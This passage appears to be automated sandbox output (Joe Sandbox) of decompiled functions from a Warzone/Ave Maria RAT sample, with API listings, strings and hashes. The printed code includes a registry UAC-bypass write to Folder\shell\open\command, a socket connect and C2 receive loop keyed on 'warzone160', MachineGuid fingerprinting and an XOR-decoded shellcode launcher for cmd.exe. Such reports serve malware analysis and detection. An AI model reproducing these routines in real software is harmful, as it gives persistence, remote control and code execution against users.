                                        • Part of subcall function 0025E907: lstrcmpA.KERNEL32(?,0025F9CB,?,open,0025F9CB), ref: 0025E940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                      • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                      • API String ID: 4274177235-2474467583
                                      • Opcode ID: c048155ff1bdb7bdfad26d844e20ec2d957ae2eab88fd0bc572f4f08a3945b9f
                                      • Instruction ID: a7dad8df6b188c17fb3e40ae49249fa5cee4e3accd00ebaf3c24558c954b654d
                                      • Opcode Fuzzy Hash: c048155ff1bdb7bdfad26d844e20ec2d957ae2eab88fd0bc572f4f08a3945b9f
                                      • Instruction Fuzzy Hash: 7D016271A38660CF8746EF24BC0D1197A91E789B19711C21AF408DB351DBB005A5CFD4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 73%
                                      			E0025F65C(void* __ecx, char* _a4, CHAR* _a8) {
                                      				void* _v8;
                                      				long _t9;
                                      				int _t12;
                                      				int _t15;
                                      				long _t16;
                                      
                                      				_t15 = lstrlenA(_a8);
                                      				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
                                      				if(_t9 == 0) {
                                      					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
                                      					RegCloseKey(_v8);
                                      					if(_t16 == 0) {
                                      						_t12 = 1;
                                      					} else {
                                      						_push(_t16);
                                      						goto L2;
                                      					}
                                      				} else {
                                      					_push(_t9);
                                      					L2:
                                      					SetLastError();
                                      					_t12 = 0;
                                      				}
                                      				return _t12;
                                      			}


                                      APIs
                                      • lstrlenA.KERNEL32(0025F938,00264713,?,?,0025F938,00264713,?), ref: 0025F664
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,0025F938,00264713,?), ref: 0025F681
                                      • SetLastError.KERNEL32(00000000,?,?,0025F938,00264713,?), ref: 0025F68C
                                      • RegSetValueExA.ADVAPI32(?,00264713,00000000,00000001,0025F938,00000000,?,?,0025F938,00264713,?), ref: 0025F6A4
                                      • RegCloseKey.ADVAPI32(?,?,?,0025F938,00264713,?), ref: 0025F6AF
                                      Strings
                                      • Software\Classes\Folder\shell\open\command, xrefs: 0025F677
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseErrorLastOpenValuelstrlen
                                      • String ID: Software\Classes\Folder\shell\open\command
                                      • API String ID: 1613093083-2536721355
                                      • Opcode ID: 37ea969b55bfadfc60378cb3e4d570a0c812fe210fe7e0b2f6542b877c6b5b7b
                                      • Instruction ID: 79a073a845c186b59dca2f5087be68c3418634b982b641ade205d0a22039f1a0
                                      • Opcode Fuzzy Hash: 37ea969b55bfadfc60378cb3e4d570a0c812fe210fe7e0b2f6542b877c6b5b7b
                                      • Instruction Fuzzy Hash: 48F09036950224FBDF211FA0ED0DFDA3BADEF15751F108060FE15A6060D6F18A28EA98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 37%
                                      			E0025538F(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				void _v40;
                                      				void* _t36;
                                      				signed int _t40;
                                      				signed int _t42;
                                      				void* _t44;
                                      				signed int _t47;
                                      				intOrPtr _t53;
                                      				intOrPtr _t54;
                                      				signed int* _t55;
                                      
                                      				_v8 = _v8 & 0x00000000;
                                      				_t44 = __ecx;
                                      				E00252F52(__ecx,  &_a4);
                                      				 *((intOrPtr*)(_t44 + 4)) = _a8;
                                      				E0025E20D(_t44 + 0x1d8);
                                      				_t47 = 8;
                                      				memset( &_v40, 0, _t47 << 2);
                                      				_v28 = 6;
                                      				_t36 =  &_v40;
                                      				_t53 = 1;
                                      				_v32 = 1;
                                      				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
                                      				if(_t36 != 0) {
                                      					L4:
                                      					_t53 = 0;
                                      				} else {
                                      					_t54 =  *((intOrPtr*)(_v8 + 0x18));
                                      					_t40 = 2;
                                      					__imp__#23(_t40, 1, 0);
                                      					 *(_t44 + 0xc) = _t40;
                                      					if(_t40 == 0xffffffff) {
                                      						goto L4;
                                      					} else {
                                      						_t55 = _t44 + 0x1c8;
                                      						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
                                      						_t42 = 2;
                                      						 *_t55 = _t42;
                                      						__imp__#9(_a8);
                                      						 *(_t44 + 0x1ca) = _t42;
                                      						__imp__freeaddrinfo(_v8);
                                      						__imp__#4( *(_t44 + 0xc), _t55, 0x10);
                                      						if(_t42 != 0xffffffff) {
                                      							 *((intOrPtr*)(_t44 + 8)) = 1;
                                      							ReleaseMutex( *(_t44 + 0x1d8));
                                      						} else {
                                      							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
                                      							goto L4;
                                      						}
                                      					}
                                      				}
                                      				E00255A2D(_a4);
                                      				return _t53;
                                      			}


                                      APIs
                                        • Part of subcall function 00252F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,002533F1,00000000,00000000,?,00254AC0,?,?,?,?,?), ref: 00252F7E
                                        • Part of subcall function 0025E20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025E211
                                      • getaddrinfo.WS2_32(?,00000000,00254AC8,00000000), ref: 002553DC
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 002553F3
                                      • htons.WS2_32(?), ref: 00255419
                                      • freeaddrinfo.WS2_32(00000000), ref: 00255429
                                      • connect.WS2_32(?,?,00000010), ref: 00255435
                                      • ReleaseMutex.KERNEL32(?), ref: 0025545F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                      • String ID:
                                      • API String ID: 2516106447-0
                                      • Opcode ID: cf74375c74bf8dc9a8aa02b6696324564b4cccba6c889c8d580070dee7b142f7
                                      • Instruction ID: dd3bc3e29122f321318924aad4a0b2f0e2bf90eeab3089ad568280ab40ac0d79
                                      • Opcode Fuzzy Hash: cf74375c74bf8dc9a8aa02b6696324564b4cccba6c889c8d580070dee7b142f7
                                      • Instruction Fuzzy Hash: D1219F71A00604EBDF10DF61E888BDA7BB8FF44321F108065FD09DB291D7B09A59CB64
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _strrchr
                                      • String ID: Actx
                                      • API String ID: 3213747228-89312691
                                      • Opcode ID: dcdefaa96ecba3e08e07ee987e1db02f789c16f60a938597036e37ff1907a7f4
                                      • Instruction ID: bdd8f14d8ee9926528fb3fb7fe9dd9144a888f856b515b1cfa13e3b9b07a533b
                                      • Opcode Fuzzy Hash: dcdefaa96ecba3e08e07ee987e1db02f789c16f60a938597036e37ff1907a7f4
                                      • Instruction Fuzzy Hash: 1FB1447292028B9FDB128F58C885BBEBFE5FF55310F5441A9EA44AB381D3359941CBE0
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: *?$.
                                      • API String ID: 269201875-3972193922
                                      • Opcode ID: 176ca1dfeeaba7049e50e9e5823c34ed6f47d4fca2541c5520a5665a2d5b650c
                                      • Instruction ID: 591b0b89443afe12f4b5e385f0552b1680a69b9e3af1e6f747d0a19ce6f3a97c
                                      • Opcode Fuzzy Hash: 176ca1dfeeaba7049e50e9e5823c34ed6f47d4fca2541c5520a5665a2d5b650c
                                      • Instruction Fuzzy Hash: E261387AD1021A9FDF15CFA8C8858EDFBF5EF58310F6441AAD985E7300E631AA418B90
                                      Uniqueness

                                      Uniqueness Score: 0.75%

                                      C-Code - Quality: 79%
                                      			E002551E4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				char _v28;
                                      				char _v36;
                                      				char _v44;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				char _v65600;
                                      				void* _t45;
                                      				char* _t52;
                                      				intOrPtr _t77;
                                      				void* _t83;
                                      				void* _t84;
                                      				void* _t85;
                                      				void* _t108;
                                      				char* _t109;
                                      				void* _t112;
                                      				void* _t113;
                                      				void* _t114;
                                      
                                      				_t108 = __edx;
                                      				_t85 = __ecx;
                                      				_t45 = E00251130(0x10040, __ecx);
                                      				_t84 = _t85;
                                      				if( *((intOrPtr*)(_t84 + 0xc)) != 0xffffffff) {
                                      					_v28 = 0xea60;
                                      					__imp__#21( *((intOrPtr*)(_t84 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
                                      					E00251052( &_v65600, 0, 0xffff);
                                      					_t114 = _t113 + 0xc;
                                      					_v60 = 0;
                                      					_v56 = 0;
                                      					E00252E33( &_v44, _t108, E002531EC( &_v12, "warzone160"));
                                      					E00255A2D(_v12);
                                      					_v16 = 0;
                                      					_v12 = 0;
                                      					do {
                                      						_t52 =  &_v65600;
                                      						__imp__#16( *((intOrPtr*)(_t84 + 0xc)), _t52, 0xc, 0);
                                      						_t109 = _t52;
                                      						if(_t109 != 0xc) {
                                      							if(_t109 == 0xffffffff) {
                                      								break;
                                      							}
                                      							goto L8;
                                      						}
                                      						_v24 = 0;
                                      						_t102 =  &_v24;
                                      						_v20 = 0;
                                      						E00252DC1( &_v24,  &_v65600, _t52);
                                      						_t103 = _t114;
                                      						E00252E79(_t114,  &_v24);
                                      						E00252E79(_t114,  &_v44);
                                      						E00255C32( &_v52, _t108, _t114, _t103,  &_v24, _t102);
                                      						_t114 = _t114 + 0x10;
                                      						_t77 =  *((intOrPtr*)(_v52 + 4));
                                      						_t112 = _t77 + 0xc;
                                      						if(_t77 == 0 || _t112 == _t109) {
                                      							L6:
                                      							E00252E66( &_v52);
                                      							E00252E66( &_v24);
                                      						} else {
                                      							do {
                                      								_t83 =  &_v65600 + _t109;
                                      								__imp__#16( *((intOrPtr*)(_t84 + 0xc)), _t83, _t112 - _t109, 0);
                                      								_t109 = _t109 + _t83;
                                      							} while (_t112 != _t109);
                                      							goto L6;
                                      						}
                                      						L8:
                                      						_t92 =  &_v16;
                                      						E00252DC1( &_v16,  &_v65600, _t109);
                                      						_t93 = _t114;
                                      						E00252E79(_t114,  &_v16);
                                      						E00252E79(_t114,  &_v44);
                                      						E00255C32( &_v36, _t108, _t114, _t93,  &_v16, _t92);
                                      						_t114 = _t114 + 0x10;
                                      						E00252DF3(_t84 + 0x10);
                                      						E00252DC1(_t84 + 0x10, _v36, _t109);
                                      						E00252DF3( &_v16);
                                      						E00252DF3( &_v36);
                                      						E00254B8D(_t84, _t108, _a4);
                                      						E00252E66( &_v36);
                                      						_push(0);
                                      						_pop(0);
                                      					} while (_t109 > 0);
                                      					E00252E66( &_v16);
                                      					E00252E66( &_v44);
                                      					return E00252E66( &_v60);
                                      				}
                                      				return _t45;
                                      			}

                                      APIs
                                      • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 0025521B
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002531F5
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253202
                                        • Part of subcall function 002531EC: lstrcpyA.KERNEL32(00000000,?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253215
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 0025526B
                                      • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 002552D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                      • String ID: `$warzone160
                                      • API String ID: 3973575906-811885577
                                      • Opcode ID: c79ade6264ebbed59af71abca3b8d404e7134565af88a31a1811f43d73badc75
                                      • Instruction ID: c45ecc119077b808d53f16043192cca4eb278338beec44f04e6859f65112ef12
                                      • Opcode Fuzzy Hash: c79ade6264ebbed59af71abca3b8d404e7134565af88a31a1811f43d73badc75
                                      • Instruction Fuzzy Hash: 2A417071920128EBCB15EF90DC96DEEBB38EF05351F004159FC15A6191DB706A6CCFA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 32%
                                      			E0025DC53(intOrPtr* __ecx, void* __edx) {
                                      				void* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				int _v20;
                                      				char _v24;
                                      				int* _t18;
                                      				void* _t48;
                                      				int* _t50;
                                      				intOrPtr _t53;
                                      
                                      				_t48 = __edx;
                                      				_t35 = __ecx;
                                      				_t50 = __ecx;
                                      				_v8 = 0;
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				 *((intOrPtr*)(__ecx)) = 0;
                                      				 *((intOrPtr*)(__ecx + 4)) = 0;
                                      				_t53 =  *0x267d48; // 0x0
                                      				if(_t53 != 0) {
                                      					_t18 = 0x267d44;
                                      				} else {
                                      					RegOpenKeyExW(0x80000002,  *(E00253412( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
                                      					asm("sbb esi, esi");
                                      					E00255A2D(_v12);
                                      					if(1 != 0) {
                                      						E0025EF61( &_v8, _t48, E00253412( &_v12, L"MachineGuid"),  &_v24);
                                      						E00255A2D(_v12);
                                      						E0025EF4C( &_v8);
                                      					}
                                      					E00252CCC(_t50, E00255C02( &_v16,  &_v24));
                                      					E00252E66( &_v16);
                                      					_t35 = 0x267d44;
                                      					_t18 = _t50;
                                      				}
                                      				E00252CCC(_t35, _t18);
                                      				E00252E66( &_v24);
                                      				E0025EF4C( &_v8);
                                      				return _t50;
                                      			}

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0025DC97
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0025F3B9,?,0000000A,80000001), ref: 0025EF84
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,0025F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025EFA7
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: D}&$D}&$MachineGuid$SOFTWARE\Microsoft\Cryptography
                                      • API String ID: 1903904756-2195274810
                                      • Opcode ID: 71b23118d6708ff81288e3f674bf21b896d68ececb81cce4efec39c1041be0a2
                                      • Instruction ID: e7ef40736b9b7e30af7df9140b9afb54ad7538a8ee95575d5176bbc788a9a8dd
                                      • Opcode Fuzzy Hash: 71b23118d6708ff81288e3f674bf21b896d68ececb81cce4efec39c1041be0a2
                                      • Instruction Fuzzy Hash: A6114F71920119EBCB18FB94D9528EDB778AF51702B600169B801B3192EFB06F6DCB94
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 74%
                                      			E0025EAC8(void* __ecx, void* __eflags) {
                                      				void* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				void* _t15;
                                      				intOrPtr* _t16;
                                      				intOrPtr _t34;
                                      				void* _t45;
                                      
                                      				_t45 = __eflags;
                                      				_t15 = E0025E8EC();
                                      				_push(__ecx);
                                      				_t16 = E0025E907(_t15, "VirtualQuery", _t45);
                                      				if(_t16 != 0) {
                                      					_t16 =  *_t16(E0025EAC8,  &_v44, 0x1c);
                                      					_t34 = _v40;
                                      					_t47 = _t34;
                                      					if(_t34 != 0) {
                                      						E0025E762(_t34, _t47);
                                      						MessageBoxA(0, "Bla2", "Bla2", 0);
                                      						_push(_t34);
                                      						_v12 = 0;
                                      						E0025EB77( &_v16, _t47, E00253412( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
                                      						E00255A2D(_v8);
                                      						_v8 = 0;
                                      						E00255A2D(0);
                                      						_push(0);
                                      						_v12 = 0;
                                      						E0025EB77( &_v16, _t47, E00253412( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
                                      						E00255A2D(_v8);
                                      						_v8 = 0;
                                      						return E00255A2D(0);
                                      					}
                                      				}
                                      				return _t16;
                                      			}

                                      APIs
                                        • Part of subcall function 0025E907: lstrcmpA.KERNEL32(?,0025F9CB,?,open,0025F9CB), ref: 0025E940
                                      • MessageBoxA.USER32(00000000,Bla2,Bla2,00000000), ref: 0025EB0E
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025EB77: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0025EBB2
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 0025EB4C
                                      • VirtualQuery, xrefs: 0025EAD5
                                      • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0025EB1C
                                      • Bla2, xrefs: 0025EB05, 0025EB0B, 0025EB0C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                      • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                      • API String ID: 1196126833-2308542105
                                      • Opcode ID: e29e3945979fc35815a7270c7a93f32b5a477ca68f7d15a9d44b652aa4e91212
                                      • Instruction ID: a601f0253320b603076f92d49f3d669fa0d6d4b2c1f2c5dca51f4ad502b4771b
                                      • Opcode Fuzzy Hash: e29e3945979fc35815a7270c7a93f32b5a477ca68f7d15a9d44b652aa4e91212
                                      • Instruction Fuzzy Hash: FC117771920514BA8F0CFBA0DD57CEE7B7CEF04712B104159F802A2582DF305F69CA69
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 73%
                                      			E0025F73D(void* __ecx) {
                                      				long _v8;
                                      				void* _t7;
                                      				void* _t17;
                                      				void* _t24;
                                      				void* _t26;
                                      				WCHAR* _t31;
                                      
                                      				_push(__ecx);
                                      				_t17 = __ecx;
                                      				_t26 = E002510AD(0x800);
                                      				_t24 = _t26;
                                      				_t7 = 0x601;
                                      				do {
                                      					 *_t24 =  *(0x263c00 + _t24) ^ 0x00000045;
                                      					_t24 = _t24 + 1;
                                      					_t7 = _t7 - 1;
                                      				} while (_t7 != 0);
                                      				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
                                      				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
                                      				GetWindowsDirectoryW(_t31, 0x104);
                                      				E0025102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
                                      				_t5 = _t26 + 0xef; // 0xef
                                      				return  *_t5(_t31, _t17, 0, 0);
                                      			}

                                      APIs
                                        • Part of subcall function 002510AD: GetProcessHeap.KERNEL32(00000000,00000000,0025F750,00000800,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 002510B3
                                        • Part of subcall function 002510AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 002510BA
                                      • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 0025F77B
                                      • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000), ref: 0025F78F
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?), ref: 0025F79D
                                      • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000), ref: 0025F7AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocHeapVirtual$DirectoryProcessProtectWindowslstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 34486464-2003734499
                                      • Opcode ID: f3371f942879826852fd0c0c2ca2b72bbab4298c5971ce20a4027c22153ec441
                                      • Instruction ID: 51a1c3d9850853cf5bcd47baaf705e7dec947efe70d526fb6134769587a23635
                                      • Opcode Fuzzy Hash: f3371f942879826852fd0c0c2ca2b72bbab4298c5971ce20a4027c22153ec441
                                      • Instruction Fuzzy Hash: 61017B71740751BBF2205774AD0AFAB3B9CDB8BB51F104024FB08EA1C1C9F5AC198798
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,012E52C3,?,?,012E528B,?,00000000), ref: 012E5332
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,012E52C3,?,?,012E528B,?,00000000), ref: 012E5345
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,012E52C3,?,?,012E528B,?,00000000), ref: 012E5368
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
